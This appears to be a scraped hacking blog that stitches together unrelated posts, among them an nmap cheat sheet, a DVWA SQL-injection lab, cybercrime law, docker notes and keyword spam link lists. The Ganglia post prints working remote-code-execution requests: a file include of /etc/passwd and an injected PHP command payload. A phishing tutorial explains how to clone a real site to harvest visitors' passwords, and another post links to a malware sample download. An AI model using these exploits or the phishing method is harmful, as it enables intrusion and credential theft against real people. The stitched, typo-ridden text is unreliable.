sábado, 25 de abril de 2020

What Is Cybersecurity And Thier types?Which Skills Required To Become A Top Cybersecurity Expert ?

What is cyber security in hacking?

The term cyber security  refers to the technologies  and processes designed  to  defend computer system, software, networks & user data from unauthorized access, also from threats distributed through the internet by cybercriminals,terrorist groups of hacker.

Main types of cybersecurity are
Critical infrastructure security
Application security
Network Security 
Cloud Security 
Internet of things security.
These are the main types of cybersecurity used by cybersecurity expert to any organisation for safe and protect thier data from hack by a hacker.

Top Skills Required to become Cybersecurity Expert-

Problem Solving Skills
Communication Skill
Technical Strength & Aptitude
Desire to learn
Attention to Detail 
Knowledge of security across various platforms
Knowledge of Hacking
Fundamental Computer Forensic Skill.
These skills are essential for become a cybersecurity expert. 
Cyber cell and IT cell these are the department  in our india which provide cybersecurity and looks into the matters related to cyber crimes to stop the crime because in this digitilization world cyber crime increasing day by day so our government of india also takes the immediate action to prevent the cybercrimes with the help of these departments and also arrest the victim and file a complain against him/her with the help of cyberlaw in our constitution.


Related word

  1. Libros De Hacking Pdf
  2. Hacking Curso
  3. Hacking Prank

CEH: Identifying Services & Scanning Ports | Gathering Network And Host Information | NMAP


CEH scanning methodology is the important step i.e. scanning for open ports over a network. Port is the technique used to scan for open ports. This methodology performed for the observation of the open and close ports running on the targeted machine. Port scanning gathered a valuable information about  the host and the weakness of the system more than ping sweep.

Network Mapping (NMAP)

Basically NMAP stands for Network Mapping. A free open source tool used for scanning ports, service detection, operating system detection and IP address detection of the targeted machine. Moreover, it performs a quick and efficient scanning a large number of machines in a single session to gathered information about ports and system connected to the network. It can be used over UNIX, LINUX and Windows.

There are some terminologies which we should understand directly whenever we heard like Open ports, Filtered ports and Unfiltered ports.

Open Ports means the target machine accepts incoming request on that port cause these ports are used to accept packets due to the configuration of TCP and UDP.

Filtered ports means the ports are usually opened but due to firewall or network filtering the nmap doesn't detect the open ports.

Unfiltered means the nmap is unable to determine whether the port is open or filtered  while the port is accessible.

Types Of NMAP Scan


Scan TypeDescription
Null Scan This scan is performed by both an ethical hackers and black hat hackers. This scan is used to identify the TCP port whether it is open or closed. Moreover, it only works over UNIX  based systems.
TCP connectThe attacker makes a full TCP connection to the target system. There's an opportunity to connect the specifically port which you want to connect with. SYN/ACK signal observed for open ports while RST/ACK signal observed for closed ports.
ACK scanDiscovering the state of firewall with the help ACK scan whether it is stateful or stateless. This scan is typically used for the detection of filtered ports if ports are filtered. Moreover, it only works over the UNIX based systems.
Windows scanThis type of scan is similar to the ACK scan but there is ability to detect an open ports as well filtered ports.
SYN stealth scanThis malicious attack is mostly performed by attacker to detect the communication ports without making full connection to the network.
This is also known as half-open scanning. 

 

All NMAP Commands 


CommandsScan Performed
-sTTCP connect scan
-sSSYN scan
-sFFIN scan
-sXXMAS tree scan
-sNNull scan
-sPPing scan
-sUUDP scan
-sOProtocol scan
-sAACK scan
-sWWindow scan
-sRRPC scan
-sLList/DNS scan
-sIIdle scan
-PoDon't ping
-PTTCP ping
-PSSYN ping
-PIICMP ping
-PBICMP and TCP ping
-PBICMP timestamp
-PMICMP netmask
-oNNormal output
-oXXML output
-oGGreppable output
-oAAll output
-T ParanoidSerial scan; 300 sec between scans
-T SneakySerial scan; 15 sec between scans
-T PoliteSerial scan; .4 sec between scans
-T NormalParallel scan
-T AggressiveParallel scan, 300 sec timeout, and 1.25 sec/probe
-T InsaneParallel scan, 75 sec timeout, and .3 sec/probe

 

How to Scan

You can perform nmap scanning over the windows command prompt followed by the syntax below. For example, If you wanna scan the host with the IP address 192.168.2.1 using a TCP connect scan type, enter this command:

nmap 192.168.2.1 –sT

nmap -sT 192.168.2.1

Related news


Learning Web Pentesting With DVWA Part 1: Installation



In this tutorial series I'm going to walk you through the damn vulnerable web application (DVWA) which is damn vulnerable. Its main goal according to the creators is "to aid security professionals to test thier skills and tools in a legal environment, help web developers better understand the process of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment."

I am going to install DVWA in docker so the prerequisite for this tutorial will be an installation of docker (Docker is not the only way to install DVWA but if you have docker already installed then it may be the easiest way to install DVWA).

To install DVWA in docker run your docker deamon if it's not running already and open a terminal or powershell and type:

docker rum --rm -it -p 8080:80 vulnerables/web-dvwa




It will take some time to pull the image from docker hub depending on your internet speed and after it is complete it will start the dvwa application. In the command we have mapped the image instance's port 80 to our hosts port 8080 so we should be able to access the web application from our host at http://localhost:8080

Now open your favorite web browser and go to http://localhost:8080
You should be prompted with a login screen like this:



login with these creds:
username: admin
password: password

After login you'll see a database setup page since this is our first run. Click on Create / Reset Database button at the bottom. It will setup database and redirect you to login page. Now login again and you'll see a welcome page.



Now click on DVWA Security link at the bottom of the page navigation and make sure the security level is set to Low. If it is not click on the dropdown, select Low and then click submit.




Now our setup is complete, so lets try a simple SQL attack to get a taste of whats about to come.

Click on SQL Injection in navigation menu.
You'll be presented with a small form which accepts User ID.
Enter a single quote (') in the User ID input field and click Submit.
You'll see an SQL error like this:



From the error message we can determine that the server has a MariaDB database and we can see the point of injection.
Since there are many quotes we are not able to determine the exact location of our injection. Lets add some text after our single quote to see exactly where our injection point is.
Now I am going to enter 'khan in the User ID field and click Submit.



Now we can see exactly where the point of injection is. Determining the point of injection is very important for a successful SQL injection and is sometimes very hard too, though it might not be that much useful here in this exercise.

Now lets try the very basic SQL Injection attack.
In the User ID field enter ' or 1=1-- - and click Submit.



We will explain what is going on here in the next article.


References:-
1. DVWA Official Website: http://www.dvwa.co.uk/
More information

jueves, 23 de abril de 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448Read more

CLOUDKiLL3R - Bypasses Cloudflare Protection Service Via TOR Browser


CLOUDKiLL3R bypasses Cloudflare protection service via TOR Browser !

CLOUDKiLL3R Requirements :
  • TOR Browser to scan as many sites as you want :)
  • Python Compiler

CLOUDKiLL3R Installation ?
Make sure that TOR Browser is up and running while working with CLOUDKiLL3R .
Make sure that the IP AND PORT are the same in TOR Browser preferences > advanced > Networks
Include the files below in one folder :
  • FILTER.txt
  • CK.pl
Make Sure The Modules Below Are Installed If NOT > use this command to install one : pip install [module name]
  • argparse
  • socks
  • socket
  • requests
  • sys

Contact :
Twitter.com/moh_security


Continue reading


  1. Certificacion Ethical Hacking
  2. Wifi Hacking
  3. Aprender A Ser Hacker
  4. Hacking Ético Curso
  5. Curso Completo De Hacking Ético
  6. Hacking Definition
  7. Hacking Linux Distro
  8. Hacking Linkedin
  9. Android Hacking

What Is Cybercrime? What Are The Types Of Cybercrime? What Is Cyberlaw In India?

What is cyber crime?

Cybercrime is the use of computers & networks to perform illegal activities such as spreading viruses,online  bullying,performing unauthorized electronic fund transfers etc. Most cyber crimes are committed through the internet.
Some cyber crime also be carried out using mobile phones via Sms and online chatting applications.

TYPES OF CYBERCRIME

The following list presents the common types of cybercrimes-

1-Computer Fraud-Intential deception for personal gain via the use of computer system.

2-Privacy Violations-Exposing personal information such as email addresses,phone numbers,account details etc, on social media,websites,etc.

3-Identity theft-Stealing personal information from somebody and impersonating that person.

4-Sharing copyright files/information-This involves distributing copyright protected files such as eBooks and computer program etc.

5-Electronic funds transfer-This involves gaining an unauthorized access to bank computer networks and making illegal funds transferring.

6-Electronic money laundering-This involves the use of the computer to launder money.

7-Atm fraud-This involves intercepting ATM card details such as account numbers and PIN numbers.These details are then used to withdraw funds from the intercepted accounts.

8-Denial of service attack-This involves the use of computers in multiple locations to attack servers with a view of shutting them down.

9-Spam:sending unauthorized emails.
These emails usually contain advertisements.


CYBER LAW

Under The Information Technology Act,2000 
CHAPTER XI-OFFENCES-66. Hacking with computer system.

1-whoever with the Intent to cause or knowing that he is likely to cause Wrongfull Loss or Damage to the public or any person Destroys or Deletes or Alter any Information Residing in computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

2-whoever commits hacking shell be punished with imprisonment up to three years, or  with fine which may extend up to two lakh rupees,or with both.

Related word


miércoles, 22 de abril de 2020

How To Download Torrents Files Directly To Your Android Device

Download-Torrent-files-Android-Devices
uTorrent, one of the most popular BitTorrent clients, is now available for Android smartphones and tablets. Its use on mobile devices is very similar to its use in the PC. All you need is to search for torrents using the web browser on your mobile device, then uTorrent will download the files.

Procedure:

Other softwares

More information
  1. Que Significa Hat
  2. Tipos De Hacker
  3. Hacking Ético
  4. Libro Hacking Etico
  5. El Mejor Hacker Del Mundo
  6. Hacking Windows: Ataques A Sistemas Y Redes Microsoft
  7. Windows Hacking
  8. Pagina Hacker

lunes, 20 de abril de 2020

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

Everything over the internet is secured by the passwords. You need a login to do any stuff on any social or banking website. Passwords are the first security measure for these type of websites. So, I brought a tutorial on how to hack such sort of login passwords. This tutorial is based on credential harvester attack method. In which you will know about hacking passwords using credential harvester attack method.

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

REQUIREMENTS

It's very simple and easy to follow. Before you start, you need the following things to work with.
  1. Kali Linux OS
  2. Target Website

STEPS TO FOLLOW

  • Run the Kali Linux machine. If you have not Kali Linux installed, you can grab a free copy and install it as a virtual machine. You can learn more about Kali Linux VirtualBox installation.
  • Sign in to Kali Linux by entering username root and password toor.
  • As you'll sign in, navigate to the Applications > Social Engineering Tools > Social Engineering as shown in the following screenshot.
  • Now you will see the different options. You have to choose Social Engineering Attacks by simply entering its number in the terminal. Once you do it, it will show a few options further. Simply choose Website Vector Attack by putting its number.
  • Website vector attack will show up it's a different type of attacks. We are going to use Credential Harvester Attack.
  • Choose the Site Clone option. As you do it, it will ask for your public IP address. Just open up a new terminal and type ifconfig. It'll show the public IP. Just copy it and paste in the previous terminal as shown in the following screenshots.
  • After we do it. Enter the target website of which passwords you want to hack. Make sure to use a website that has username and password on the same page.
  • All done now. As someone opens up the browser on the public IP we specified, it'll show up the website that we entered in the previous step. Now as someone enters their username or password, it will be captured in the terminal.

That's all. If you're not clear yet. You can watch the following complete video tutorial on how to do it.
Related links

JoomlaScan - Tool To Find The Components Installed In Joomla CMS, Built Out Of The Ashes Of Joomscan


A free and open source software to find the components installed in Joomla CMS, built out of the ashes of Joomscan.

Features
  • Scanning the Joomla CMS sites in search of components/extensions (database of more than 600 components);
  • Locate the browsable folders of component (Index of ...);
  • Locate the components disabled or protected
  • Locate each file useful to identify the version of a components (Readme, Manifest, License, Changelog)
  • Locate the robots.txt file or error_log file
  • Supports HTTP or HTTPS connections
  • Connection timeout

Next Features
  • Locate the version of Joomla CMS
  • Find Module
  • Customized User Agent and Random Agent
  • The user can change the connection timeout
  • A database of vulnerable components

Usage
usage: python joomlascan.py [-h] [-u URL] [-t THREADS] [-v]
optional arguments:
-h, --help              show this help message and exit

-u URL, --url URL The Joomla URL/domain to scan.
-t THREADS, --threads THREADS
The number of threads to use when multi-threading
requests (default: 10).
-v, --version show program's version number and exit

Requirements
  • Python
  • beautifulsoup4 (To install this library from terminal type: $ sudo easy_install beautifulsoup4 or $ sudo pip install beautifulsoup4)

Changelog
  • 2016.12.12 0.5beta > Implementation of the Multi Thread, Updated database from 656 to 686 components, Fix Cosmetics and Minor Fix.
  • 2016.05.20 0.4beta > Find README.md, Find Manifes.xml, Find Index file of Components (Only if descriptive), User Agent and TimeOut on Python Request, Updated database from 587 to 656 components, Fix Cosmetics and Minor Fix.
  • 2016.03.18 0.3beta > Find index file on components directory
  • 2016.03.14 0.2beta > Find administrator components and file Readme, Changelog, License.
  • 2016.02.12 0.1beta > Initial release




Related posts


  1. Pentest Tools Find Subdomains
  2. Pentest Box Tools Download
  3. Hacker Tools Mac
  4. Nsa Hack Tools Download
  5. Hack App
  6. Pentest Tools Linux
  7. Pentest Tools Subdomain
  8. Underground Hacker Sites
  9. Hack Website Online Tool
  10. Pentest Tools Find Subdomains
  11. Hacker Tools For Pc
  12. Hacking Tools For Windows
  13. Underground Hacker Sites
  14. Pentest Tools For Windows
  15. Hacking Tools For Kali Linux
  16. Hacking Tools Software
  17. Hacker Tools For Mac
  18. Underground Hacker Sites

Over 700 Malicious Typosquatted Libraries Found On RubyGems Repository

As developers increasingly embrace off-the-shelf software components into their apps and services, threat actors are abusing open-source repositories such as RubyGems to distribute malicious packages, intended to compromise their computers or backdoor software projects they work on. In the latest research shared with The Hacker News, cybersecurity experts at ReversingLabs revealed over 700

via The Hacker NewsRelated posts

Dockers And Containers


For years, developer had a challenge setting up development environment with the right configurations of tools as well as time required for the same.

This becomes even more complex when developer is using diverse technology stack. Consider a scenario where developer has written code in Python to accept the web requests using Mongo DB as back-end and further using analytics application to generate report.

Now as you can see diverse technology stack comes into picture here, is it easy task to setup all these stacks and connect with each others? Not at all. That's where docker technology comes into picture.

Above problem for installing the required technology tools/stack becomes very handy just with few commands! Rest you rely on the docker to take care of back-end dependencies.


  1. docker run  --name=db -d mongo   (This will install complete running Mongo DB for you )
  2. docker run --name=db -d MySQL  (This will install complete running MySQL DB for you )
  3. docker run  --name=db -d nginix   (This will install complete running NGINX for you )
Its that easy! Of course we can mention additional configurations by parameters, you can refer respective docker documentation for the same.



By Default when container is started, IP address is allocated within the sub net range defined for bridge network.

First we can list the interfaces as mentioned below : 

docker network ls









For viewing the details of default IP range configured we can use following command,

docker network inspect bridge
















Now we know the default range allocated for container. We can list the IP address of running container by executing following command

docker container inspect --format '' <container name>








List docker container processes running on system along with their details

docker ps








Related links


Linux.Agent Malware Sample - Data Stealer



Research: SentinelOne, Tim Strazzere Hiding in plain sight?
Sample credit: Tim Strazzere


List of files

9f7ead4a7e9412225be540c30e04bf98dbd69f62b8910877f0f33057ca153b65  malware
d507119f6684c2d978129542f632346774fa2e96cf76fa77f377d130463e9c2c  malware
fddb36800fbd0a9c9bfffb22ce7eacbccecd1c26b0d3fb3560da5e9ed97ec14c  script.decompiled-pretty
ec5d4f90c91273b3794814be6b6257523d5300c28a492093e4fa1743291858dc  script.decompiled-raw
4d46893167464852455fce9829d4f9fcf3cce171c6f1a9c70ee133f225444d37  script.dumped

malware_a3dad000efa7d14c236c8018ad110144
malware fcbfb234b912c84e052a4a393c516c78
script.decompiled-pretty aab8ea012eafddabcdeee115ecc0e9b5
script.decompiled-raw ae0ea319de60dae6d3e0e58265e0cfcc
script.dumped b30df2e63bd4f35a32f9ea9b23a6f9e7


Download


Download. Email me if you need the password


Related articles